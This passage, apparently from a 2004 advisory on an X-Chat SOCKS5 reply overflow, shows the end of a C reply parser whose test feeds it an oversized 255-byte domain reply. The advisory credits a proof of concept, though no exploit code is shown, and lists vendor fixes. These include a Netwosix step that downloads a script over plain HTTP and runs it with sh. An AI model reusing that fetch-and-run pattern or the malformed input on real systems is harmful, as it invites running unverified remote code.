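    *port = (uint16_t)((msg[off + need] << 8) | msg[off + need + 1]);
    return S5_OK;
}

int main(void)
{
    /* Constructed sample replies, not captured traffic. */
    const uint8_t good[] = {0x05, 0x00, 0x00, 0x03, 0x04,
                            'i', 'r', 'c', 'd', 0x1a, 0x0b};
    uint8_t oversized[5 + 255 + 2];
    uint8_t addr[10];
    size_t n = 0;
    uint16_t port = 0;

    memset(oversized, 'x', sizeof oversized);
    memcpy(oversized, "\x05\x00\x00\x03\xff", 5); /* length byte = 255 */

    printf("good:      %d\n", socks5_parse_reply(good, sizeof good,
                                                 addr, sizeof addr, &n, &port));
    printf("oversized: %d\n", socks5_parse_reply(oversized, sizeof oversized,
                                                 addr, sizeof addr, &n, &port));
    return 0;
}
```
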

- Exploit

The following proof of concept exploit has been supplied by vade79/v9 v9@fakehalo.deadpig.org.

- Solution

Red Hat has released an advisory (RHSA-2004:177-01) and fixes to address this issue in Red Hat Linux 9. Red Hat Linux users are advised to see the referenced advisory for further details regarding obtaining and applying appropriate fixes.

Gentoo has released updates for this issue, which may be applied with the following commands:
# emerge sync
# emerge -pv "=net-irc/xchat-1.8.11-r1"
# emerge "=net-irc/xchat-1.8.11-r1"

Debian has released advisory DSA 493-1 with patches dealing with this issue.

Mandrake has released advisory MDKSA-2004:036 as well as fixes dealing with this issue.

Netwosix has released an advisory (LNSA-#2004-0014) and fixes for this issue. To obtain fixed packages, users should execute the following commands:
# cd /usr/ports/graphics/xchat/
# rm nepote
# wget http://download.netwosix.org/0014/nepote
# sh nepote

The vendor has also released a source code patch.

Red Hat has released a Fedora legacy advisory (FLSA:1549) to address this issue in xchat. This advisory fixes the issue in Red Hat Linux 7.3 running on the i386 architecture. Please see the referenced advisory for more details and information about obtaining fixes.

Red Hat has released advisory RHSA-2004:297-09 and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Fedora Legacy has released security advisory FLSA:123013 addressing this issue for Fedora Core 1 and Core 2. Users are advised to see the referenced advisory for details on obtaining and applying the appropriate updates.


RedHat xchat-1.8.11-7.i386.rpm

X-Chat X-Chat 1.8.9

X-Chat X-Chat 2.0.1

X-Chat X-Chat 2.0.4

X-Chat X-Chat 2.0.5

X-Chat X-Chat 2.0.6

X-Chat X-Chat 2.0.7

X-Chat X-Chat 2.0.8

- Related references

 

 
